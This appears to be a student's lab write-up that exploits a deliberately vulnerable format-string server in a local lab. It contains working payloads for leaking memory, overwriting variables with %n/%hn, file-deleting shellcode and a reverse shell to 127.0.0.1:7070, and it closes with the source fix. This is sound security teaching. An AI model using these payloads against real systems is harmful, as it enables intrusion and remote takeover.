Format-String
- Table of Contents
- Preparation
- Task 1: The Vulnerable Program
- Task 2: Understanding the Layout of the Stack
- Task 3: Crash the Program
- Task 4: Print Out the Server Program’s Memory
- Task 5: Change the Server Program’s Memory
- Task 6: Inject Malicious Code into the Server Program
- Task 7: Getting a Reverse Shell
- Task 8: Fix the Problem
- Conclusion
Preparation
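1. What is a format string?
    printf ("The magic number is: %d", 1911);
Run the statement above and you will see that the format specifier %d in the string "The magic number is: %d" is replaced by the argument (1911), so the output becomes "The magic number is: 1911". That, roughly, is what a format string does.
Besides %d for decimal numbers, there are quite a few other format specifiers. Let's get to know them.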
Specifier | Meaning | Passed as |
---|---|---|
%d | decimal (int) | value |
%u | unsigned decimal (unsigned int) | value |
%x | hexadecimal (unsigned int) | value |
%s | string ((const) (unsigned) char *) | reference (pointer) |
%n | number of bytes written so far (int *) | reference (pointer) |
(The use of %n is explained in Section 5 below.)
2. The stack and format strings
The behavior of a format function is controlled by its format string; printf fetches its arguments from the stack.
    printf ("a has value %d, b has value %d, c is at address: %08x\n",a, b, &c);
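3. When the number of arguments does not match
What happens then? What if just one argument is missing?
    printf ("a has value %d, b has value %d, c is at address: %08x\n",a, b);
- In the example above, the format string asks for three arguments, but the program supplies only two.
- Will this program compile?
  - printf() is a variadic function, so the argument count alone does not reveal a problem.
  - To detect the mismatch, the compiler has to understand how printf() interprets its format string. Older compilers do not perform this analysis; current gcc and clang can warn (-Wformat), but only when the format string is a literal.
  - Sometimes the format string is not a constant at all: it is produced at run time (for example, from user input), so the compiler cannot detect the mismatch.
- Can printf() itself detect the mismatch?
  - printf() fetches its arguments from the stack. If the format string asks for three arguments, it fetches three. Unless the stack carried a boundary marker, printf() cannot know that it has run past the arguments it was actually given.
  - No such marker exists, so printf() keeps fetching data from the stack. When the counts do not match, it picks up data that does not belong to this function call.
- What happens if someone deliberately prepares the data that printf() will fetch?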
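The mismatch described above can be pictured with a toy model. This is only a sketch: a Python list stands in for 32-bit words on the stack, and `toy_printf_args` and `unrelated_word` are made-up names for illustration, not part of any real printf implementation.

```python
import re

def toy_printf_args(format_string, stack_words):
    """Return the words a printf-like function would consume, one per specifier."""
    # Count simple specifiers such as %d, %x, %08x and %s.
    wanted = len(re.findall(r"%[0-9.]*[dxs]", format_string))
    # Nothing marks where the caller's real arguments end, so we just keep reading.
    return stack_words[:wanted]

a, b = 1, 2
unrelated_word = 0xDEADBEEF      # stack data that was never passed to printf
stack = [a, b, unrelated_word]   # the caller supplied only a and b

fmt = "a has value %d, b has value %d, c is at address: %08x\n"
consumed = toy_printf_args(fmt, stack)
print([hex(w) for w in consumed])
```

The third specifier picks up `unrelated_word`, which is exactly the kind of data leak the bullets describe.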
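4. Accessing memory at an arbitrary location
- We want to read the data at some memory address, but we cannot modify the code; all we control is the format string.
- If printf is called with %s but no matching pointer argument, it takes the target address from whatever word on the stack sits where the argument would be. printf keeps an internal pointer that starts at its first argument, which is how it locates every argument on the stack.
- Observation: the format string itself is on the stack. If we encode the target address into the format string, the target address is on the stack too. In the following example the format string is stored in a buffer on the stack.
    int main(int argc, char *argv[])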
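If we can make printf take the target address from the format string (which is also on the stack), we can access that address.
    printf ("\x10\x01\x48\x08 %x %x %x %x %s");
\x10\x01\x48\x08 are the four bytes of the target address. In C, \x10 tells the compiler to place the single byte 0x10 at that position. Without the \x prefix, 10 would simply be the two ASCII characters 1 and 0, which is not what we want. Each %x moves printf's argument pointer toward the format string (see Section 2).
We use four %x to advance printf's argument pointer to the place where the format string is stored. Once it is there, %s prints the contents at the address formed by those four bytes (0x10014808 in the order written; a little-endian x86 machine reads the same bytes as 0x08480110). Because the data is treated as a string, printing continues until a terminating null byte is reached.
The stack space between the user_input array and the address of the argument passed to printf is not meant for printf. Because of the format string vulnerability, however, printf treats that memory as arguments and matches it against the %x specifiers.
The main challenge is to work out the distance between printf's argument pointer (the address it fetches arguments from) and the user_input array; that distance determines how many %x you need before %s.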
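5. Writing a number into memory
%n: the number of characters written so far is stored into the corresponding argument.
    int i;
- The number 5 (**the count of characters before %n**) is written into i.
- Using the same approach as for reading arbitrary memory, we can write a number to a chosen address: replacing %s with %n in the example from Section 4 overwrites the contents of 0x10014808.
- With this technique an attacker can:
  - overwrite program flags that control access privileges;
  - overwrite return addresses on the stack, function pointers, and so on.
- However, the value written is determined by the number of characters printed before %n. Is there really a way to write an arbitrary value?
  - The crudest way is to count: to write 1000, pad the output with 1000 characters.
  - To avoid an overly long format string, use a width specifier instead. For example, %0Nx (with N a number) pads the value on the left with zeros up to N characters.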
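The effect of a width specifier on the character count can be checked without touching the server. The sketch below relies on the fact that Python's % operator accepts the same zero-padding and width syntax as C for %x; `chars_emitted` is a hypothetical helper name.

```python
def chars_emitted(spec, value):
    """Number of characters a single specifier produces for the given value."""
    return len(spec % value)

# Without a width, the count depends on the value being printed.
short = chars_emitted("%x", 0x3)
# With a width, the count is at least that width, whatever the value is.
fixed = chars_emitted("%08x", 0x3)
# A 7-character specifier is enough to emit 1000 characters.
big = chars_emitted("%01000x", 0x3)

print(short, fixed, big)
```

This is why the later payloads use %8x rather than %x: a fixed width makes the running count predictable.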
Task 1: The Vulnerable Program
First disable address space layout randomization so that addresses stay the same across runs:
    sudo sysctl -w kernel.randomize_va_space=0
Download the program server.c and compile it with the command below:
    gcc -z execstack -o server server.c
Ignore the warning.
    on the server VM
Whatever you type on the client VM is then printed by the server VM.
Task 2: Understanding the Layout of the Stack
Disassemble server to find the return address of myprintf().
    objdump -d server > server.out
In the disassembly of main, the instruction that follows the call to myprintf() is at 0x0804872d, so that is the return address of myprintf().
Next we need to find where this return address is stored on the stack. We can print the stack with %p, or with %.8x instead. Entering %p on the client VM prints 0xbf9dfa10, and %.8x prints bf9dfa10: the same value in two notations.
So we send:
    %p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p|
The output is:
    [11/21/19]seed@VM:~/.../formatString$ sudo ./server
From this we can reconstruct the stack layout:
    (stack top)
The distance between the format string and the stack slot holding msg is $8 \times 4 = 32$ bytes. The address of msg is 0xbffff0a0 and the value of msg is 0xbffff0e0, so the address of the format string is 0xbffff0a0 - 32 = 0xbffff080.
So,
Question 1: What are the memory addresses at the locations marked by ➊, ➋, and ➌?
- ➊ The address of the format string is 0xbffff080.
- ➋ The return address of myprintf() is stored at 0xbffff0a0 - 4 = 0xbffff09c.
- ➌ The address of buf is 0xbffff0e0 (the value of msg is the address of buf).
Question 2: What is the distance between the locations marked by ➊ and ➌?
The distance between ➊ and ➌ is 0xbffff0e0 - 0xbffff080 = 0x60 = 96 bytes.
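The address arithmetic for Questions 1 and 2 can be replayed in a few lines. This is a sketch that assumes the two values read from the stack dump in this run (0xbffff0a0 and 0xbffff0e0); the variable names are illustrative only.

```python
WORD = 4  # bytes per stack slot on 32-bit x86

addr_of_msg = 0xBFFFF0A0    # stack slot that holds the msg argument
value_of_msg = 0xBFFFF0E0   # msg points at the input buffer

format_string_addr = addr_of_msg - 8 * WORD   # marker 1
return_addr_slot = addr_of_msg - WORD         # marker 2
buf_addr = value_of_msg                       # marker 3

distance = buf_addr - format_string_addr
words = distance // WORD

print(hex(format_string_addr), hex(return_addr_slot), hex(buf_addr))
print(distance, words)
```

A distance of 24 words is what later leads to 23 skipping specifiers followed by one specifier that uses the first word of the buffer.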
Task 3: Crash the Program
There are a few tricks for crashing the program.
    %08x.%08x.%08x prints the values at the next few stack positions
We noticed a 0x3 on the stack. If printf is made to treat it as an address (with %s), it dereferences an invalid pointer and the program crashes.
Type the following on the client VM:
    %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
We made it: the server crashes.
Task 4: Print Out the Server Program’s Memory
Task 4-A: Stack Data
To print out the stack data, just send a series of %.8x or %p:
    %.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|%.8x|
Task 4-B: Heap Data
To print out the value of the secret message, we need to construct a payload with a script (the shell one-liner below; Python works too). Since we already know its address, this is easy. **From the questions above, the distance between the format string and the buffer is 96 bytes, that is, 24 words. We use 23 %p to advance printf's argument pointer from its starting position to the buffer that holds our input (the address of the secret message). The 24th specifier, %s, tells printf() to treat the word in the buffer as an address and print the string stored there.**
    echo $(printf "\xc0\x87\x04\x08")%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%s | nc 127.0.0.1 9090
Note that x86 is little-endian, so the address 0x080487c0 is written as the bytes \xc0\x87\x04\x08.
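The same payload can be assembled in Python, which makes the byte order explicit. This is a minimal sketch: `build_read_payload` is a hypothetical helper, and the address and the count of 23 are the values measured in this write-up, so they would need to be re-measured on another machine.

```python
import struct

def build_read_payload(target_addr, words_to_skip):
    """Address bytes first, then skipping specifiers, then %s to dereference."""
    addr = struct.pack("<I", target_addr)   # "<I" = little-endian 32-bit
    return addr + b"%p" * words_to_skip + b"%s"

payload = build_read_payload(0x080487C0, 23)
print(payload[:4])
print(len(payload))
```

The resulting bytes can be written to a file and sent to the server the same way as the output of the echo command above.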
Task 5: Change the Server Program’s Memory
Task 5-A: Change the value to a different value
In this sub-task, we need to change the content of the target
variable to something else. Your task is considered as a success if you can change it to a different value, regardless of what value it may be.
We already know that the address of target is 0x0804a040.
    echo $(printf "\x40\xa0\x04\x08")%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%n > input5a
The value of target is then changed to:
    The value of the 'target' variable (after): 0x000000b5
Task 5-B: Change the value to 0x500
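In this sub-task, we need to change the content of the target variable to a specific value, 0x500. Your task is considered a success only if the variable's value becomes 0x500.
Without padding, the payload in this run prints 0xb3 = 179 characters before %n (4 address bytes plus 175 characters from the 23 %p). Since 0x500 - 0xb3 = 1280 - 179 = 1101, we need to add 1101 characters before the first %p.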
1 | echo $(printf "\x40\xa0\x04\x08")*********************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%n > input2 |
Output:
1 | @�*********************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************0xbffff0a00xb7fba0000x804871b0x30xbffff0e00xbffff6c80x804872d0xbffff0e00xbffff0b80x100x804864c0xb7e1b2cd0xb7fdb6290x100x30x82230002(nil)(nil)(nil)0x3bae00020x100007f(nil)(nil) |
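Typing 1101 padding characters by hand is error-prone, so the count is easier to handle in a script. The sketch below assumes the baseline of 0xb3 characters observed in this run (it changes whenever the printed stack values change length); the constant names are made up for illustration.

```python
import struct

TARGET_ADDR = 0x0804A040
WANTED = 0x500
BASELINE = 0xB3   # characters printed before %n when no padding is added

padding = WANTED - BASELINE
payload = (
    struct.pack("<I", TARGET_ADDR)   # address that %n will write to
    + b"*" * padding                 # filler that raises the character count
    + b"%p" * 23                     # skip to the start of the buffer
    + b"%n"                          # store the count at TARGET_ADDR
)
print(padding)
```

A width specifier such as the %0Nx form from Section 5 would give the same count with a much shorter payload.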
Task 5-C: Change the value to 0xff990000
This sub-task is similar to the previous one, except that the target value is now a large number. Printing out this large number of characters may take hours.
The basic idea is to use %hn instead of %n, so that we modify a two-byte memory location instead of four bytes. Printing out $2^{16}$ characters does not take much time. We can break the memory of the target variable into two blocks of two bytes each. We just need to set one block to 0xFF99 and the other to 0x0000.
This means that the attack has to provide two addresses in the format string. In format string attacks, changing the content of a memory location to a very small value is quite challenging (please explain why in the report); 0x00 is an extreme case. To achieve this goal, we need to use an overflow technique. The basic idea is that when we make a number larger than what the storage allows, only the lower part of the number is stored (basically, an integer overflow).
For example, if the number $2^{16} + 5$ is stored in a 16-bit memory location, only 5 is stored. Therefore, to get to zero, we just need to bring the number to $2^{16} = 65536$.
In this sub-task we use %hn in place of %n, which writes only a half word (two bytes). To change the value to 0xff990000, we write 0xff99 to one half and 0x0000 to the other. A count of 0 cannot be printed directly, so we reach it by overflow.
The two addresses are 0x0804a040 (low half) and 0x0804a042 (high half). We first bring the low 16 bits of the character count to 0xff99 and write them to 0x0804a042. Then we print 0x10000 - 0xff99 = 103 more characters, so the low 16 bits wrap around to 0x0000, and write them to 0x0804a040. The four filler bytes \x22\x22\x22\x22 between the two addresses are consumed by the %0103x specifier.
    echo $(printf "\x42\xa0\x04\x08\x22\x22\x22\x22\x40\xa0\x04\x08")%655069x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%hn%0103x%hn > input5c
Output:
1 | bfb1e0e0b76e0000 804871b 3bfb1e120bfb1e708 804872dbfb1e120bfb1e0f8 10 804864cb75412cdb7701629 10 382230002 0 0 0eae60002 100007f 0 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000022222222 |
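The widths in this payload can be checked by keeping only the low 16 bits of the running character count, which is all that %hn stores. The sketch assumes 12 header bytes (two addresses plus filler) and 22 %8x specifiers of exactly 8 characters each, as in the payload above; the names are illustrative.

```python
HEADER = 12            # two 4-byte addresses plus 4 filler bytes
FIRST_WIDTH = 655069   # width of the first %x in the payload
FIXED = 22 * 8         # twenty-two %8x specifiers, 8 characters each
SECOND_WIDTH = 103     # width of the %0103x between the two %hn

def low16(n):
    """Value that %hn actually stores: the count truncated to 16 bits."""
    return n & 0xFFFF

count_at_first_hn = HEADER + FIRST_WIDTH + FIXED
count_at_second_hn = count_at_first_hn + SECOND_WIDTH

print(hex(low16(count_at_first_hn)), hex(low16(count_at_second_hn)))
```

The first count is far larger than 0xff99, but only its low 16 bits matter, so a smaller first width with the same remainder modulo 65536 would work as well.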
Task 6: Inject Malicious Code into the Server Program
In this task we need to overwrite the return address so that it points to our shellcode.
To find the offset of the shellcode, we first put some NOPs (0x90) into the buffer and look for them in memory.
Using gdb, we get:
    the value of msg(the address of buf): 0xbfffe718
So we construct a payload:
    echo $(printf "\xbc\x6f\xff\xbf")%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%hn$(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90") > input
The NOPs end up at 0xbfffe790, so the offset is 0xbfffe790 - 0xbfffe718 = 0x78.
The new return address is therefore 0xbffff0e0 + 0x78 = 0xbffff158.
As in Task 5-C, we change the two bytes at 0xbffff09c and the two bytes at 0xbffff09e, which originally hold 0x0804872d. The first width is 0xbfff - 3*4 - 22*8 = 48963 (12 bytes of addresses and filler, then 22 %8x of 8 characters each), and the second is 0xf158 - 0xbfff = 12633. We then build the payload below. After a few tries, changing the second width to 12611 made the attack succeed.
    echo $(printf "\x9e\xf0\xff\xbf\x11\x11\x11\x11\x9c\xf0\xff\xbf")%048963x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%hn%012611x%hn$(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\\x31\xc0\x50\x68bash\x68////\x68/bin\x89\xe3\x31\xc0\x50\x68-ccc\x89\xe0\x31\xd2\x52\x68ile \x68/myf\x68/tmp\x68/rm \x68/bin\x89\xe2\x31\xc9\x51\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80") > input6
Output:
    [11/21/19]seed@VM:/tmp$ touch myfile
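The two widths used in the payload follow from the target return address. The sketch below recomputes them under the same assumptions as the text (12 header bytes, 22 %8x specifiers of 8 characters each); the variable names are illustrative, and the final line shows which low half the hand-tuned width 12611 actually produces.

```python
HEADER = 12      # two 4-byte addresses plus 4 filler bytes
FIXED = 22 * 8   # twenty-two %8x specifiers, 8 characters each

new_return_addr = 0xBFFFF0E0 + 0x78
high_half = new_return_addr >> 16       # written first, to 0xbffff09e
low_half = new_return_addr & 0xFFFF     # written second, to 0xbffff09c

first_width = high_half - HEADER - FIXED
second_width = low_half - high_half

# The write-up ended up using 12611 for the second width after some trial runs.
tuned_low_half = high_half + 12611

print(hex(new_return_addr), first_width, second_width, hex(tuned_low_half))
```

Writing the smaller half first works here because the character count can only grow between the two %hn writes.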
Task 7: Getting a Reverse Shell
To get a reverse shell, we only need to change one part of the shellcode.
We split the command /bin/bash -i > /dev/tcp/127.0.0.1/7070 0<&1 2>&1 into four-byte pieces and substitute them for the code between line 1 and line 2, that is:
    "\x31\xc0" // xorl %eax, %eax : eax = 0
We can split that command into:
    \x68/bin
and then we get the payload:
    echo $(printf "\x9e\xf0\xff\xbf\x11\x11\x11\x11\x9c\xf0\xff\xbf")%048963x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%hn%012611x%hn$(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\\x31\xc0\x50\x68bash\x68////\x68/bin\x89\xe3\x31\xc0\x50\x68-ccc\x89\xe0\x31\xd2\x52\x682>&1\x68<&1 \x6870 0\x681/70\x680.0.\x68127.\x68tcp/\x68dev/\x68 > /\x68h -i\x68/bas\x68/bin\x89\xe2\x31\xc9\x51\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80") > input7
Output:
    [11/21/19]seed@VM:~/.../formatString$ nc -l 7070 -v
Now we have a root shell!
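Splitting the command into push instructions by hand is easy to get wrong, so here is a small sketch of the same step. `command_to_pushes` is a hypothetical helper, not part of the lab material; it relies only on the fact that 0x68 is the x86 opcode for pushing a 4-byte immediate.

```python
PUSH_IMM32 = b"\x68"  # x86 opcode: push a 4-byte immediate value

def command_to_pushes(command):
    """Turn a command string into push instructions, last chunk first."""
    data = command.encode("ascii")
    if len(data) % 4 != 0:
        raise ValueError("pad the command to a multiple of 4 bytes first")
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The stack grows downward, so the end of the string is pushed first.
    return b"".join(PUSH_IMM32 + chunk for chunk in reversed(chunks))

cmd = "/bin/bash -i > /dev/tcp/127.0.0.1/7070 0<&1 2>&1"
pushes = command_to_pushes(cmd)
print(pushes)
```

The command above is exactly 48 bytes long, so it splits into 12 chunks with no padding, matching the sequence of \x68 pieces in the payload.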
Task 8: Fix the Problem
Remember the warning message generated by the gcc
compiler? Please explain what it means. Please fix the vulnerability in the server program, and recompile it. Does the compiler warning go away? Do your attacks still work? You only need to try one of your attacks to see whether it still works or not.
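The warning (typically "format not a string literal and no format arguments") means that msg is passed to printf() as the format string itself, so any format specifiers in the input are interpreted. To fix it, change printf(msg); to printf("%s", msg); and recompile.
    cp server.c server2.c
Now when we enter %p%p%p on the client VM, the stack is no longer printed; the input is echoed literally.
    [11/21/19]seed@VM:~/.../formatString$ nc -u 127.0.0.1 9090
    [11/21/19]seed@VM:~/.../formatString$ cp server.c server2.c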
Conclusion
A good lab!!!!